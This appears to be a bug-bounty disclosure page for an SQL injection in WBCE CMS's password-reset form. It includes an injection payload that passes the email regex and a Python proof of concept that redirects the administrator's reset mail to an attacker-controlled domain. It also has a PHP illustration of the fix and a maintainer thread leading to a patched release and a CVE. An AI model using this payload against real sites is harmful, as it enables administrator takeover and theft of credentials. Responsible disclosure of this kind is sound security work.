SQL Injection in wbce/wbce_cms

Valid

Reported on

Nov 27th 2021


Description

An attacker can recover the administrator's plaintext password through an SQL injection in the password reset page.

admin/login/forgot/index.php lines 33-34:

$sSql = "SELECT * FROM `{TP}users` WHERE `email` = '" . $email . "'";
$rRow = $database->query($sSql);

Because the email validation is weak, an attacker can inject arbitrary SQL into this query and recover the administrator's password.

admin/login/forgot/index.php, lines 26-30:

    $email = strip_tags($wb->get_post('email'));
    if ($admin->validate_email($email) == false) {
        $oMsgBox->error($MESSAGE['USERS_INVALID_EMAIL']);
        $email = '';
    }

The validate_email function, located in framework/class.wb.php, lines 617-631:

public function validate_email($email)
    {
        if (function_exists('idn_to_ascii')) {
            // use pear if available
            $email = @idn_to_ascii($email);
        } else {
            require_once WB_PATH . '/include/idna_convert/idna_convert.class.php';
            $IDN = new idna_convert();
            $email = $IDN->encode($email);
            unset($IDN);
        }
        // regex from NorHei 2011-01-11
        $retval = preg_match("/^((([!#$%&'*+\\-\/\=?^_`{|}~\w])|([!#$%&'*+\\-\/\=?^_`{|}~\w][!#$%&'*+\\-\/\=?^_`{|}~\.\w]{0,}[!#$%&'*+\\-\/\=?^_`{|}~\w]))[@]\w+(([-.]|\-\-)\w+)*\.\w+(([-.]|\-\-)\w+)*)$/", $email);
        return ($retval != false);
    }

Regex filtering is not adequate protection against SQL injection: the character class used for the local part of the address permits ', /, * and =, so an injected clause passes validation unchanged.

Steps to reproduce:

1. First we need to select the administrator from the users table, using this payload: '/**/or/**/user_id=1/**/or/**/'random@pylibs.org (which bypasses the regex filtering in class.wb.php)

2. Even though we have no control over the administrator's email address, we can have the reset email sent to another address.

admin/login/forgot/index.php lines 76-77:

// Setup email to send
$mail_to = $email;

The payload I used can be a real email address; at the same time it injects an SQL query and selects the administrator from the users table. In this example I used the pylibs.org domain and installed a forwarder for all emails to dectavianus07@gmail.com.
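The following PHP script is an added illustration, not WBCE code and not what the fix commit changed: it runs the report's payload through the page's regex and through PHP's FILTER_VALIDATE_EMAIL, then compares the concatenated query from index.php against a prepared statement, using an in-memory SQLite table as a stand-in for `{TP}users`. The table layout, the sample rows and the use of PDO are assumptions; the local part of the payload is legal RFC 5322 atext, which is why no correct email validator rejects it.

```php
<?php
// Added example (not WBCE code and not the fix commit's content): shows why the
// report's payload passes e-mail validation and how the two defects on this page
// (string-built query, $mail_to = $email) are closed. An in-memory SQLite table is
// an assumed stand-in for `{TP}users`; the rows are constructed sample data.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT, email TEXT, password TEXT)");
$db->exec("INSERT INTO users VALUES (1, 'admin',  'admin@example.test',  'REDACTED-ADMIN')");
$db->exec("INSERT INTO users VALUES (2, 'editor', 'editor@example.test', 'REDACTED-EDITOR')");

// Constructed input: the payload from the report above.
$email = "'/**/or/**/user_id=1/**/or/**/'random@pylibs.org";

// 1. Validation does not help. Every character in the local part is RFC 5322
//    atext, so the page's regex and PHP's built-in validator both accept it.
$pageRegex = "/^((([!#$%&'*+\\-\/\=?^_`{|}~\w])|([!#$%&'*+\\-\/\=?^_`{|}~\w][!#$%&'*+\\-\/\=?^_`{|}~\.\w]{0,}[!#$%&'*+\\-\/\=?^_`{|}~\w]))[@]\w+(([-.]|\-\-)\w+)*\.\w+(([-.]|\-\-)\w+)*)$/";
printf("page regex accepts payload:    %s\n", preg_match($pageRegex, $email) === 1 ? 'yes' : 'no');
printf("FILTER_VALIDATE_EMAIL accepts: %s\n", filter_var($email, FILTER_VALIDATE_EMAIL) !== false ? 'yes' : 'no');

// 2. Vulnerable lookup, as in admin/login/forgot/index.php: the quote in the
//    input closes the literal and "or user_id=1" matches the administrator row.
$vulnRows = $db->query("SELECT user_id, email FROM users WHERE email = '" . $email . "'")
               ->fetchAll(PDO::FETCH_ASSOC);
printf("concatenated query matched %d row(s)\n", count($vulnRows));

// 3. Hardened lookup: a bound parameter keeps the entire input inside one string
//    value, so the same payload matches no account at all.
$stmt = $db->prepare("SELECT user_id, email FROM users WHERE email = ?");
$stmt->execute([$email]);
$safeRows = $stmt->fetchAll(PDO::FETCH_ASSOC);
printf("prepared statement matched %d row(s)\n", count($safeRows));

// 4. The reset mail must go to the address stored in the matched row, never to
//    the submitted string; otherwise a catch-all domain in the input receives it.
$mail_to = count($safeRows) === 1 ? $safeRows[0]['email'] : null;
printf("reset mail recipient: %s\n", $mail_to ?? '(no account, send nothing)');
```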

Proof of Concept

# PoC.py
import requests

_url = 'http://localhost/wbce/admin/login/forgot/index.php' # from my localhost environment
_domain = 'pylibs.org' # you have to catch all emails! I used Namecheap domain controller's 'catch all emails and redirect to specific email address' feature

headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Connection': 'close'
}

_p = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40" + _domain + "&submit=justrandomvalue"

r = requests.post(url=_url, headers=headers, data=_p)
if r.status_code == 200:
    print('[+] Check your email, you are probably going to receive the plaintext password which belongs to the administrator :)')

In the end, you should receive an email from the vulnerable endpoint at the '/**/or/**/user_id=1/**/or/**/'random@yourdomainname.com address.

Impact

Authentication bypass in this web application is effectively pre-auth RCE, since an authenticated administrator can run PHP code through templates or by uploading new modules.

Occurrences

We are processing your report and will contact the wbce/wbce_cms team within 24 hours. a year ago
maxway2021
a year ago

Researcher


Can I get a CVE ID... I am curious about it right now :)

We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
maxway2021
a year ago

Researcher


@admin can we invite any other people to this page? I contacted the vendor and they are asking about vulnerability details. I think it's better for the vendor to see it on this page so I won't have to copy all the information.

Jamie Slome
a year ago

Admin


@maxway2021 - feel free to share the URL for this page with others. It is protected, and so only users with maintainer permissions can view your report.

I have tagged you in a comment on GitHub responding to the maintainers.

Regarding the CVE, we can assign a CVE if the maintainer is also happy to do so once the report has been marked as valid and fixed.

Let me know if you have any further questions, and happy to help 👋

maxway2021
a year ago

Researcher


They already fixed the vulnerability before I reached out

Jamie Slome
a year ago

Admin


We just need to wait for the maintainer to come on platform and confirm this as well.

maxway2021
a year ago

Researcher


I shared the link with vendors, I think they will respond soon.

Jamie Slome
a year ago

Admin


Great 👍

We have contacted a member of the wbce/wbce_cms team and are waiting to hear back a year ago
A wbce/wbce_cms maintainer
a year ago

Maintainer


confirmed. Fixed in https://github.com/WBCE/WBCE_CMS/commit/6ca63f0cad5f0cd606fdb69a372f09b7d238f1d7

we will release WBCE CMS 1.5.2 tomorrow

A wbce/wbce_cms maintainer validated this vulnerability a year ago
maxway2021 has been awarded the disclosure bounty
The fix bounty is now up for grabs
maxway2021
a year ago

Researcher


@admin now you can assign a CVE, can't you?

maxway2021
a year ago

Researcher


oh well, I think you will assign the CVE after the fix, okay understood 😅

maxway2021
a year ago

Researcher


@admin WBCE CMS 1.5.2 (fixed version) released

Jamie Slome
a year ago

Admin


Exactly, we just require the maintainer to confirm the commit SHA that fixes the vulnerability via the platform.

A wbce/wbce_cms maintainer
a year ago

Maintainer


What am I supposed to do? Click on the green button top right?

And please allow the WBCE users an appropriate time to fix their installation before disclosing this vulnerability.

Jamie Slome
a year ago

Admin


@maintainer - when you are ready to make this report public, please click the confirm fix button, where you will be asked to provide a commit SHA and patched version.

Just for clarity, once this report is "fixed", it will be visible to the public.

maxway2021
a year ago

Researcher


@admin what about requesting CVE identification

Jamie Slome
a year ago

Admin


We will arrange this once the fix has been confirmed and the maintainer is happy for a CVE to be published for this report.

It seems that the maintainer would like a small delay in taking the report public + publishing a CVE, so that the community can fix their vulnerable installations.

maxway2021
a year ago

Researcher


ok

A wbce/wbce_cms maintainer marked this as fixed in 1.5.2 with commit 6ca63f a year ago
maxway2021 has been awarded the fix bounty
This vulnerability will not receive a CVE
index.php#L33 has been validated
maxway2021
a year ago

Researcher


@admin can we assign CVE now

maxway2021
a year ago

Researcher


I mean request to assign a CVE ID

maxway2021
a year ago

Researcher


please

maxway2021
a year ago

Researcher


@maintainer I think this is the best way to inform users about a critical vulnerability. It will help users understand why they should update the system asap.

Jamie Slome
a year ago

Admin


@maxway2021 - we can, we just need the go-ahead from the maintainer, and we can arrange this for you. We will wait for the maintainer to respond and share their thoughts 👍

A wbce/wbce_cms maintainer
a year ago

Maintainer


We have informed our users as best as we can (website, forum, newsletter, update information in the backend) and gave them 7 days to update. So yes, you can go ahead creating a CVE ID.

Jamie Slome
a year ago

Admin


Great, I will go ahead and arrange this now!

Jamie Slome
a year ago

Admin


CVE published: CVE-2021-3817 🎊

maxway2021
a year ago

Researcher


Finally 😃 Thank you everyone!

Jamie Slome
a year ago

Admin


Great work!
